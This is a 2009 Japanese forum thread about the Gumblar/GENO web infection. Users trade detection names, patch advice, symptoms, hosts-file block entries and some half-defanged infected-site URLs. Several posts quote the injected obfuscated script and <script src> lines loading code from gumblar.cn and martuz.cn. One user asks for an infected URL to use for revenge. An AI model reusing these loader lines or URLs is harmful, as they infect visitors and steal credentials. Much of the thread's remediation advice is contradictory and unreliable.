Avast常駐中に「JS:Redirector-H 〜 JS:Redirector-H9」か、類似の名称で検知した場合は zlkon.lv/gumlar.cn/martuz.cn からマルウェアを落とそうとするページである可能性が高い…程度の表現かなぁ。 JS:Redirector-H(無印),JS:Redirector-H2,JS:Redirector-H4,JS:Redirector-H7,JS:Redirector-H9は 手元の検体で確認済み。
お前意地張ってないで 本スレ見た方がいいぞ 今あっちでは双葉ちゃんねるが感染したって騒ぎになってるから
>>169 おおどうもです。そんなサイト探してました。とりあえずルーター設定でやってみます。
どこが本スレだよ 教えやがれ奴隷ども
>>166 なるほど。了解。
そこまでやってなかったわ。
取り敢えずうちのPCは感染していない事が判ったので 俺はバスターの対応を待つ それまでPCではここと2ちゃんしかみない ミクシィも携帯のみにするわ
[セキュリティ版]GENOウイルススレ ★10でID表示される掲示板が良いと言う事になって、 こっちにスレが立つことになりました。★11は立てないはずだった様ですけど。
すみません少しテンパってます、知恵を貸してください スレチなら誘導して頂けると幸いです 普段ブラウザはもっぱら火狐だがこの機会にIEも最新のにしておくかと8を用意 ↓ インスコ失敗しましたので再起動推奨しますよ!にホイホイ釣られてうっかり再起動 ↓ 何故か青くはならなかったけどデスクトップ壁紙のみ/(^o^)\ ↓ 辛うじて記憶していたショートカットでタスクマネージャ起動 ↓ 新しいタスクの実行から専ブラ起動←今ココ テンプレの症状で確認できていたのは以下のみ @cmd.exe、regedit.exeが起動しない Asqlsodbc.chmのファイルサイズがおかしい CPU使用率は常と変わらず、使っているのはWinXPSP3 2GBです リカバリするにも何処から仕掛けて良いのやらorz
スレを見てたらブラウザがウイルスに感染した、みたいなの出てきたがこれは違うやつか
>>185 ご愁傷様でした。
とっととクリーンインスコしてください
>>185 どっから感染したんだろう…
余裕でアウトだな
あんまり興味なかったからノートンでもavastでもなくてAVGなんだが
Adobe ReaderとFlash Playerを最新のにしたんですが Javascriptとかはよく分からないので放置してます。 とりあえず最新版使ってればセキュリティーホール突かれることもなく 安全なんですよね?
今はね
>>186 おお、さんきゅ。
早速踏んでみたが、確かにAvast!無反応だな。
どういうロジックでAvast!は判定してるんだろ?
unescapeを解読してるわけじゃないってことか。
avastからAviraAntivirに乗り換えた途端にavastが本気出してきて乗り換えたくなってきたぜ
>>193 まあそれでOK。他のソフトも含めて、今後もアップデート情報はチェックしとこう。
このサイト見たらアヴァストが反応するんだけどどうなの? 反応したってことは大丈夫なんだろうけど・・・ 一応閲覧注意な HTTP;//pmpk.dojin.com/
hxxp://www.ukokkei.co.jp/company/index.html
だが、
会社概要の
株式会社烏骨鶏
〒920-0024 石川県金沢市西念4丁目21番18号
TEL 076-232-4255
FAX 076-233-0405
Mail
[email protected] じゃだめなん?
>>186 F-Secureユーザですが、F-Secureへ検体提供したほうがいいですか?
急に流れが速くなったな
セキュリティソフトの会社って自作自演とかしてるの? 自分でウイルス作ってばらまいて他社より早く定義更新してユーザーに賞賛されるとかさ
Adobe Reader9.1.1公開日が5/13 今回GENOウイルスがターゲットにした脆弱性は このバージョンから対策OKなのか3/11の9.1.0で対策OKだったのかどっちかな?
>>185 です
本気でデスクトップが壁紙だけで寂しいです
アイコンもバーも無い・・・
CDとか用意した記憶がないのですがそれでもリカバリは可能でしょうか?
グーグル先生に聞いても「まずCDを作成します」から始まる絶望感
>>203 Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver
以降は別物の脆弱性ver
>>204 タスクマネージャいけるなら
新しいタスクの実行→explorer
でタスクバーとか出るんじゃね
>>202 それは結構前から言われてる事、本当かどうかは知らん
>>198 gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
12799 個のドメインを感染させています。
(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
212 :
192.168.0.774 :2009/05/17(日) 15:01:05 ID:ybsV4IQS0
ファイアフォックス使ってんだけど 弾いてくれたから大丈夫って感じなの?
>>193 と同じく、Adobe ReaderとFlash Playerを最新にして
Adobe ReaderのJavascriptは切っておいた。
あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。
ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
そういや、3週間前にFirefoxやJane Styleのログが PCシャットダウン→起動後に全飛びしたけど、 このウイルスとは関係ないよね。
ブラウザのJavascriptを切るってどうやればいいの?
テンプレに書かれている症状は一切ないし、大丈夫だと思いたい。
USBメモリでも感染る?
>>207 サンクス
ということは3月のアップデートをきっちりしておけば
こいつに関してはとりあえずOKということだね
>>218 そういう意味か
脆弱性復活したのかと思ったw
224 :
212 :2009/05/17(日) 15:07:54 ID:ybsV4IQS0
ちょwww誰か教えてくださいwww このままじゃトイレにもいけねぇ
>>185 ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。
あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
>>219 検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
最新版に更新しても新種が出るかもしれないから安心できないお…… だからadobe削除したお!
230 :
192.168.0.774 :2009/05/17(日) 15:12:17 ID:NtSEuLT8Q
感染サイトのURL貼ってる奴、マジで氏ねよ。
231 :
212 :2009/05/17(日) 15:12:25 ID:ybsV4IQS0
┃
┃ ____
┃/⌒ ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃ |
┃ /
┃ヽ  ̄/
┃ \ ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃ (::)(::) ヽ ~;゚
┃ / 〉 )
>>226 ┃ (___)
232 :
185 :2009/05/17(日) 15:16:45 ID:YGxJUpFP0
>>206 WinXPSP3って機種名ではないのでしょうか?
メーカーはマウスです
>>208 ありがとうございます!バー出ました
只今、先生に相談しながらクリーンインストールに挑戦中です
Adobe Readerは9.1.1が最新型じゃないの?
クリーンインストールって面倒なん?
>>225 良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
他のヤツに権限を与えない方がよいよ。
そのあたりは大丈夫だと思うけど。
AdobeのFlashとReaderを最新にしていたら 感染サイトを踏んでも大丈夫という情報を広めてきます。
2ちゃんの専ブラはだいじょうぶなんかねぇ。 オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
URLは極力踏まないようにすればいいよ
ソフ板も見るといいよ
しかし、Adobe Readerはわざと常駐を切らない限り、Adobe Updaterが 更新を知らせてくれるけど、Flashはヤバいね。 大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に してほしいもんだ。
そりゃないよ
>>237 見てまともなリンク先かと思って225踏んじまったじゃねーかw
うぉっかないなぁ
アクセス制限中です。しばらく経ってからアクセスしてください。 ※ 現在、大規模な攻撃を受けており、このシステムを導入しています。 ご迷惑をかけてすいません。 (o*。_。)oペコッ チェッカー ><
GENOウイルスチェッカー 今入ってるけど まさか俺のせいじゃないよね。
>>219 exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。
[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.
[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".
[ Changes to registry ]
* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".
[ Process/window information ]
* Creates process "CMD.EXE".
[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
ウィルスバスターは何してるの?
お前らウイルスセキュリティ馬鹿にしてるけどいい加減にしろよ? 2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ? 正直、 うざいから死んでwww(爆藁 信者とか妄想してる暇があったら親孝行しろw糞ww どうせリアルじゃペコペコしてんだろw ウイルスセキュリティ以下の人間だよね? 君たちww 妄想と批判しか出来ない哀れな奴らw ウイルスセキュリティ叩いてどうなる? お前らマヂ頭使えw
>>255 更新キターって聞いたけど自分のところでは黙ったままだ
ウィルスバスターいれてるんだけど役に立たないの? 対応してくれないの?
259 :
192.168.0.774 :2009/05/17(日) 16:08:37 ID:61lOiijw0
pdf見るのにFoxitReader使ってて、AdobeReaderはインスコしてないんだが、 これってFoxitReader経由でも感染するのか?
>>246 それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
>>257 俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。
xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
これ危ないのかな?
テメーのサイト見たらウィルスに感染したぞゴルァ路線はどうだろう
>>261 ここにはGenoいないっぽいけどな。
リンク先に潜んでるんだろうか。
脅威だな 救急車依頼の恐怖を感じてるんだけど
ウイルスバスターはなにしてるの? なにもしないの?
GENOウイルス対策 ■hostsファイル書き換え hostsファイルに以下の行を追加 127.0.0.1 zlkon.lv 127.0.0.1 gumlar.cn 127.0.0.1 martuz.cn ↑これをちょっと説明して頂けませんか?
zlkon.lv gumlar.cn martuz.cn に飛ぼうとすると127.0.0.1に飛ぶってことです。 要するに本来のIPに飛ぼうとするのを防止します。
>>269 右側のzlkon.lvとかにアクセスしようとする
↓
hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする
↓
127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない
↓
安全
ウィルスバスターな何やってるんだよ 早くしてくれよ 感染してるかもしれないのに
273 :
192.168.0.774 :2009/05/17(日) 16:36:46 ID:0CtfCDPI0
>>186 これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
274 :
192.168.0.774 :2009/05/17(日) 16:37:45 ID:7UVnacRX0
www■laqoo.net■kyouun■pet■index.html でavast先生がredirector H8検知した。 侵入前にブロックできたって認識でいいのかなぁ。 おかしな挙動は見られないが
>>269 初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、
windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
276 :
192.168.0.774 :2009/05/17(日) 16:41:05 ID:0CtfCDPI0
>>198 gumblar.cn にご案内〜
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
>>262 落としたいけど元々住人じゃないんでパスが判らんです
GENOじゃないですよね?
>>270 ありがとうございます
127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
>>271 リロードし忘れたorz
分かりやすい説明ありがとうございます
>>264 いないよね。でもこんなスクリプトの化け物みたいなページにはブラウザでアクセスしたくないわw
ググったけどAdobeReaderインストールしてなくてFoxit使っててもヤバいのね・・・ Foxitも環境設定でJavaScript切らないと駄目か
>>280 本件まんまですなぁ(´-`)
なんでペットの名前サイトなんかがやられてんだよw
恐ろしくてWEB周れないじゃんこれ
>>274 gumblar.cn ご案内コース
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
hostsファイルに以下の行を追加というのは 上と同じように#の中に入れればいいのでしょうか
>>264 >>281 >>283 お手数お掛けしました。
〜かなり判定厳しめに設定してあります。〜
あっちを立てるとコッチが立たず な感じみたいですね。
>>287 #はその行を無効にする(コメント扱いにする)から不要
127.0.0.0 localhost
というのが普通は最初に入ってるはずだからそれと同じ書き方
>>287 先頭に#があるのはコメント行。
#なしで行追加。
>>289 なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
やっぱここが一番建設的なスレだな
>>294 たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
>>294 adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね
adobeを最新にして全てを忘れるのが一番幸せかも試練
Spybot - Search & Destroy もhosts書き換えますね
はい。
ノートンGJ
やべえノートンに乗り換えるときがきたかも
今北用ってもう誰か作ってる? 無いなら作るけど
zlkon.lvとgumlar.cnは本当にこのドメインなのか? SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」 だとよ。
昨日このウイルスを知って不安だったので書き込みします 【OS】 XP 【使用セキュリティソフト】 avast 【疑った理由】 ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て 最新のフラッシュプレイヤーを入れてくださいとの表記が出た。 【症状】 PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり フリーズ直前までいったこともあった(作業中ではあったが・・・) 【確認手段】 cmd.exe、regedit.exeは使用可能 sqlsodbc.chmのサイズ確認 【結果】 フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった 今のところ怪しげなパケットはなさそうだが不安
>307 報告御苦労
GENOウイルス対策 ■adobe flashplayerを最新版に更新 Adobe Flash PlayerとShockwave Flashって同じものですか?
>>306 すまん。おれがb抜いちゃってるわw
gumlar.cnでなくgumblar.cnね。
>>312 んじゃあShockwave Flashってのは最新版に更新しなくてもいいんですよね?
更新のしかた分からないけどw
>>314 何で抜くんだよ
まさか手打ちなのか?普通コピーだろ
手打ち職人の朝は早い。
もしかして今GENOウイルスまとめサイト重い?
>>318 今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
gumblar.cnにしても同じだ。 zlkon.lvも
頼む('A`) 誰か地獄少女にアクセスしたんだが404だ 代わりにGEOウィルスで復讐したいんでURLくれー(VAV)
>>323 有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
>>313 もしよろしければ詳しく教えていただけないでしょうか?
NGID 4DIp3Q850 、と。よしスッキリ。
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
>>316 Shockwave player と Flash playerは別物。
ごっちゃにせず、目を見開いてよく読むこと。
>>329 評価した段階ではAレコード有効だったんだと思う。
で、Nortonの評価がグリーンになったところで再度アクティブに
なるかもしれん。
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
つまりキャッシュ情報表示してたのね。 Nortonのは今日初めて使ったが、意味ないサービスだな
まとめサイトが感染したってマジ?
>>331 どっちもwikiで調べようとすると「Adobe Flash」ってページがでるから
同じ物なのかと思いましてw
adobe flashplayerだけ最新版にしとけばOKってことですよね?
>>336 いや、人づてに聞いただけ
事実じゃないならそれでいい
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k ・小林製薬【対策済】 ・BIG-server.com【対策済】 ・ウェルネス(医療情報提供企業)【対策済】 ・薬事日報社【対策済】 ・国交省中部地方整備局岐阜国道事務所【対策済】 ・全日本民医連【対策済】 ・総合ホビー展示即売会「ビコン」公式サイト【対策済】 ・GENO(PC通販ショップ)【キャッシュ削除済】 ・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】 ・SayMove!【対策済】 ・ライブハウス「あさがやドラム」【対策済】
341 :
192.168.0.774 :2009/05/17(日) 19:12:00 ID:pC5ZVjuD0
Warning: fopen() [function.fopen]: Unable to access log/2009516.dat in /virtual/owata-net/public_html/owata-net.com/index.php on line 123 Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123 毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。 Warning:とか出てるから気味悪いけどgenoと関係ないよね? セキュ板にも貼ったけど荒れててダメっぽい!
チェッカーに通してみて
「便所の落書き」「痰ツボ」と罵倒されてきた2ちゃんねるがGENOウィルス騒動の解決に 一番大きく貢献するまで、あと五日。 (「その時歴史が動いた」 2078年5月放送予定)
>340 コピペにこんなこと言うのもなんだが ×総合ホビー展示即売会「ビコン」 ○総合ホビー展示即売会「ホビコン」 ホビーコンプレックスの略でホビコンね。
★11荒れすぎ w
★1〜2スレあたりはセキュ板とν速がほとんどだったからね 同人・VIPから流れてきてひどいことになった
荒れてるか? あれくらい大したことないと思うけど
Chromeも対象になったのが出たとかニュー即で言われたり 背景黒いほうのwikiの「感染したと〜」とアドレスがおかしいとかセキュ板で言われたり またなんかいろいろ来たらしいけど結局どうなってんのこれ
IDも出ないセキュ板の情報なんて信用出来んわ 自演し放題だし
何か一行だけになっちゃったよチェッカーのところ。 ■hostsファイル書き換え hostsファイルに以下の行を追加 127.0.0.1 martuz.cn ひょっとしてgumblar.cn zlkon.lv要らないの? 127.0.0.1 zlkon.lv 127.0.0.1 gumblar.cn 127.0.0.1 martuz.cn
見れない=感染じゃなくて ただの集中でアクセスできないだけでしょ
352 :
192.168.0.774 :2009/05/17(日) 19:30:13 ID:q9beek69O
セキュリティ板 GENOスレ11の9で紹介されていた、 ポート135, 445を閉じたらネットに繋げなくなった。 元に戻そうにもプロパティが表示されない。 デバイスマネージャーやサービスの画面を閉じようとすると プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。 それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。 誰か助けてください。
ESCなりALT+F4なりで全部終了させて再起動したのかね 右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で 再起動すればまず直る 再起動しても同じというならシラネ
>>353 いや、漏れて来るのは解ってるんだけど・・・。
私のトリップは◆XcxlmnqGqUです←――この人何処にいるのかしら。
hxxp://skyhighpremium■com ここもかな。チェッカーでは1000%とでた アクセスしたくないし、ソースチェッカー規制くらってる
>>344 ・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:43:11 ID:I820zXBQ0
http://pc12.2ch.net/test/read.cgi/software/1240881087/611 611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど
一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
359 :
352 :2009/05/17(日) 19:48:32 ID:q9beek69O
>>354 それが再起動しても直らんのです。
書き忘れましたがOSは2kです。
携帯じゃ対応策調べようにもままならず…
些細なことでもいいんで、心当たりあれば教えてください。
>>359 今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)
元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
なんだかいろいろご迷惑をおかけしております >まとめ(黒)が見れない 急激にアクセス増えたので鯖が死にそうになってるみたいです 15時からの5時間でリファラーが2000件以上増えました >メニューのリンクがおかしい 修正しました
365 :
352 :2009/05/17(日) 20:23:37 ID:q9beek69O
>>362 ありがとうございます。いい勉強になりました… orz
迷惑ついでと言っては何ですが、この質問に適切な板を教えてもらえませんか?
板名からすると、PCサロン、windowsあたり?
なぜGENOまとめWikiが劇重いんですか
>>363 見て了解しました。無意味なレス消費して大変申し訳ないです。
370 :
352 :2009/05/17(日) 20:35:14 ID:q9beek69O
>>369 スレまで誘導、ありがとうございます!
このご恩はどこかで誰かに返します。
2009 05/17 hostsファイルの古いドメイン二つを消去 martuz.cn一行でいいのね。もう旅に出ます。
ちょっと気になるが、
>>185 は、どこで感染したんだ?
>>185 の操作のみで感染したとなると、ちょっと不気味だ。
それとも、感染以外の単なるトラブルなのかな。
>>373 感染していた場合、cmd.exeを起動するのは危険とのことです。
376 :
192.168.0.774 :2009/05/17(日) 21:25:07 ID:61lOiijw0
まさに情報の錯綜って感じだなオイ
そうだったんだ。 というわけなので、まとめサイトの人修正お願いします。
あぬビスレポート見ればわかるけど 感染してて、不発だった場合 手動でcmdを実行すると火がつく可能性がある
382 :
192.168.0.774 :2009/05/17(日) 21:36:30 ID:M2s+iWsi0
>>379 これで何か起きた、って報告は聞かないから大丈夫w
なんともなかった
ほんとに? うう…
388 :
192.168.0.774 :2009/05/17(日) 22:01:24 ID:FwEBmaaZ0
正直ネット不慣れな俺には判別できんけど、ツール使わなくても確認はできるんだし安易に踏むべきじゃないのはわかる
>>375 ネタだったのかよ
本当に錯綜って感じだな・・・結局大人しく暫くネットから離れてるのが正解か・・・
>>389 cmdの起動に問題があったこともあった
いまはしらん
亜種・新種が多すぎだからネタとも言い切れないのが困り物
どっちにしろcmd実行で火噴いても、検出しても クリーニンスコするだけだからいんじゃね
気が向くたびにcmd起動させては安全を確認している俺がいる。 ニフティの公式HPが感染のデマには心底焦ったからなぁ。
ニフティのレンタル鯖だっけ?
395 :
192.168.0.774 :2009/05/17(日) 22:29:58 ID:hMuH46V60
正直怖くて、閲覧できません>< 一応アドビは最新にしてるけど、やっぱりcmd起動してばっかりいるw
>>388 ツールつかったけど、しっかり使えたよ
山田チェッカー出たときも、こんな感じで疑心暗鬼だったのかもね
sqlsodbc.chmのサイズが1,323 コマンドプロンプトとレジストリは開くんだけど・・・ このウィルスって感染してたら例えばどんな被害があるの? まじ泣きそうなんだが
>>337 okですよね、とかじゃなくて最新版に出来るならしておくもんですよ・・・
その面倒くさい精神が感染を招いてるのに不安で尚やらんってのは
他のが出てきたときにもくらかもよ
>>397 アウト
・ftpを介しての自サイトの改竄
・クレカ番号やID・Passの流出
・CPUの負荷の増大
ここら辺か?
クリーンインスコしてこい
自分のHP持ってなければ再起動した時点でPC終了、クリーンインストール以外の駆除手段無しって程度 HP持ってた場合気づかず更新するとそこがまた感染源に
401 :
ひみつの文字列さん :2024/12/19(木) 00:53:34 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
マジでか… sqlsodbc.chmのサイズが変わらないって話もなかったっけ? 気のせい?デマ? 判断材料がないとかやばすぎる
しかし今までこの形式のウイルスが出てこなかった(のかな?) のが不思議なのかもしれないね。
>>399 >>400 ありがとう
実は4月ごろに変なPCサイト見てからIEが強制終了するようになって
システム復元したらなおったんだよね。でも現在Windows update
に繋がらないから変だとは思ってた。
とりあえず今日は回線切ってクリーンインストールする
クレカはもってないから大丈夫なのかな?
405 :
401 :2009/05/17(日) 22:47:19 ID:N9SKEU4J0
>>397 >401の通り、sqlsodbc.chmのサイズが1,323バイトは、思いっきりアウトです。
可哀想ですが、現状では感染後に検出・駆除できるソフトが無いので、データを退避の上
再インストールするしか...
私の方で確認した結果では、SymantecもKasperskyも、オンラインスキャンでは感染していることが
確認できません(感染していても、何も検出しない)ので、注意お願いします。
# 今、マイクロソフトのオンラインスキャンを確認中。 マイクロソフトでダメなら、オンラインスキャンでは
多分、何やっても検知できない。
初歩的な質問で申し訳ないのですが…… ウイルス対策としてhostsファイルをNotepadで開いて「127.0.0.1 martuz.cn」等を 書き込もうとしたんですが、すでにファイルに書き込まれているホスト名はアルファベット順に 並んでいるのですが、書き込むホスト名もその中にアルファベット順にしたがって 書き込んだ方がいいのでしょうか?
407 :
192.168.0.774 :2009/05/17(日) 22:48:54 ID:FwEBmaaZ0
>>404 windows updateに繋がらないって時点でアウトだろ・・・
u.bat 今はe.batか。こいつは去年の秋ぐらいからあるみたい readerの脆弱性指摘も去年の秋だったかな genoウイルス感染報告は海外で今年3/18ぐらいだったかな ソース探してくるのがめんどくさいがそんな感じだったと記憶してる
>>402 あったきがする
>>404 オンラインでIDパスワードを使うサービスを使用しているなら
クリーンインストール後に変更推奨
他に安全なPCがあるならそちらからすぐにでも変更推奨
190 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/17(日) 01:51:35
>>178 >sqlsodbc.chmを書き換えて、何に転用しているかもよくわかってない。
ざっと見たところ、キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお
は
おえういあ
って保存されてるよ。メモ帳なんかで開いてみれば、何が盗まれたかの一部はわかるんじゃないかな
>>409 じゃあ感染しててもまったくわからないこともあるってことか…
鬱陶しいってレベルじゃねーぞこれ
感染してからsqlsodbc.chmをメモ帳を開けば面白いものが見れるのか?
うっとおしさっていう点では、ここ数年稀に見るウイルスだな
414 :
274 :2009/05/17(日) 22:53:26 ID:7UVnacRX0
うっひょう、カスペなんかもダメなのか。 さっき(念の為)オンラインでフルスキャンしたばかりだと言うのに。 >1の症状らは皆無だし様子見るかな、avastがブロックしたと信じてw
>>401 明らかに目立った不具合とかはありますか?
>>411 サイズがかわるかどうか怪しいからMD5とか確認しようって流れだった
いまはしらん
chmがキーロガーのログ部分なのか? ちょっくらVMで感染してくるか。
ぷりんてぃんがGENOに汚染
感染者がサイト持ってた場合、サイトが書き換わるのは確実 それ以外の症状は出るか不明 感染がわからないこともあるかも CPU使用率とか目安にならない?
>>420 キーロガーじゃなくてsniffingしてる。
424 :
401 :2009/05/17(日) 23:06:07 ID:N9SKEU4J0
>>410 キーロガーのログなのかなぁ...私が確保したファイルは、中身思いっきり無意味な文字列だった。
何か暗号化されてるのか、それとも仮想PCで何も入っていないから無意味な文字列になったのか。
あと、マイクロソフトのOncareオンラインスキャン終わった。
...微妙。これ、レポートが出力されないから詳細がわからなすぎる。とりあえず、
1.展開された後のウイルス本体ファイルは削除された。(>401で、muvl.nugの方)
http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1aで MicrosoftがTrojan:Win32/Daonol.Dとして本体検出したので、行けるか?とおもったけど、
一応潜伏後の本体を捕まえそう。(絶対ではないと思うけど。)
2.レジストリの方に登録されたauxのマルウェア実行登録は、そのまま残っている。
少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)
一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→
ttp://onecare.live.com/site/ja-jp/default.htm
>>423 盗聴?それだと俺なんかじゃ中身みるのは難しそうだな
sniffingしてるとして、どこに送ってるんだろ? やっぱりmartuz.cn?
>>423 それだとここ最近多発してるオンラインゲームのアカウントハックはコイツが犯人の可能性が濃厚だな。
>>427 あれは中華やチョンのマルウェア仕込んだサイトじゃなかったか
あーやばいなー 今PCおとして携帯でレスしてるんだけど今日エクスプローラ二回おちてフリーズも二回したからなー 感染してるかもしんねー
>>429 それにしちゃ薄く広いのが気になる。
FF11、RO、リネ2くらいのメジャーなのはともかく、マビノギやグラナド、MoEとかのマイナーゲーでも被害が出てる。
(ルナティア、完美世界は運営の失態なので除外)
433 :
401 :2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416 嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
sqlsodbc.chmって、ヘルプファイルですよね? なんでそんなとこの容量増やすんですか、このウィルス。 ヘルプの項目に嘘八百を追加するんですか?
435 :
401 :2009/05/17(日) 23:28:50 ID:N9SKEU4J0
>>433 >確認は、sqlsodbc.exeだけが頼りですね。
exeじゃねえ... sqlsodbc.chm ですな。
436 :
401 :2009/05/17(日) 23:30:13 ID:N9SKEU4J0
>>434 容量を増やしているのではなく、何かに使っているらしい。
